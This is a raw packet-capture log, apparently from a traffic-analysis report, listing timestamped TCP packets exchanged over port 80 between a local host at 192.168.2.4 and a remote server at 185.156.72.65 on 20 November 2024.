                                                                Nov 20, 2024 05:02:20.839267015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839268923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839281082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839289904 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839292049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839334965 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839334965 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839335918 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839349031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839358091 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839369059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839380026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839389086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839396000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839396000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839399099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839396000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839410067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839418888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839426041 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839430094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839440107 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839443922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839451075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839461088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839463949 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839472055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839478016 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839502096 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839508057 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839519024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839526892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839529037 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839540005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839549065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839550972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839559078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839570045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839580059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839581013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839591026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839598894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839601040 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839612007 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839617968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839622021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839631081 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839634895 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839641094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839662075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839678049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839680910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839680910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839689970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839700937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839701891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839710951 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839720964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839723110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839728117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839739084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839739084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839747906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839757919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839767933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839767933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839776039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839786053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839787960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839797020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839808941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839812994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839812994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839828014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839834929 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839847088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839859962 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839868069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839869022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839879990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839884996 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839890957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839900970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839909077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839914083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839919090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839930058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839932919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839940071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839948893 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839952946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839962959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839966059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839973927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839984894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839984894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840007067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840007067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840024948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840035915 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840039968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840039968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840044975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840064049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840065002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840075016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840084076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840092897 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840092897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840102911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840112925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840122938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840122938 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840133905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840143919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840145111 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840159893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840173960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840173960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840178013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840188980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840198994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840199947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840214014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840224028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840224981 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840234041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840243101 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840245008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840253115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840264082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840274096 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840276957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840282917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840293884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840295076 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840303898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840313911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840320110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840331078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840338945 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840348005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840358019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840358973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840374947 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840379953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840395927 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840396881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840408087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840416908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840420008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840428114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840437889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840450048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840459108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840460062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840470076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840481043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840482950 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840491056 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840502024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840502977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840513945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840522051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840524912 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840537071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840540886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840560913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840610981 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.061892986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.061944962 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.114296913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.114440918 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119220018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119230986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119242907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119282007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119327068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119465113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119489908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119505882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119535923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119535923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119561911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119563103 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119579077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119595051 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119611025 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119626999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119643927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119661093 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119668961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119668961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119682074 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119698048 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119698048 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119716883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119724989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119741917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119755983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119770050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119785070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119784117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119784117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119801998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119806051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119817019 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119834900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119834900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119837999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119853973 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119873047 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119889975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119891882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119918108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119929075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119930029 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119941950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119957924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119963884 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119973898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119990110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119992018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119992971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120006084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120012045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120022058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120033026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120038986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120054007 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120059967 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120059967 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120069981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120080948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120086908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120102882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120106936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120106936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120120049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120127916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120145082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120156050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120156050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120162010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120179892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120196104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120199919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120199919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120212078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120220900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120229006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120238066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120248079 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120254993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120264053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120274067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120291948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120310068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120364904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120381117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120394945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120409966 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120420933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120420933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120425940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120441914 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120443106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120460033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120461941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120481014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120481014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120501995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120503902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120521069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120537043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120552063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120558023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120580912 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120580912 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120592117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120604992 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120608091 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120625019 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120637894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120641947 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120641947 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120656013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120661974 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120672941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120678902 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120687962 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120701075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120701075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120706081 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120724916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120747089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120748043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120781898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120798111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120806932 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120811939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120827913 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120829105 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120843887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120856047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120856047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120860100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120876074 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120876074 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120893002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120902061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120903015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120909929 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120923042 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120927095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120939970 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120943069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120956898 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120969057 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120976925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120985985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121001005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121001959 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121002913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121018887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121021986 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121035099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121041059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121051073 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121058941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121067047 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121076107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121083975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.121104002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121104002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121128082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.121138096 CET8049730185.156.72.65192.168.2.4
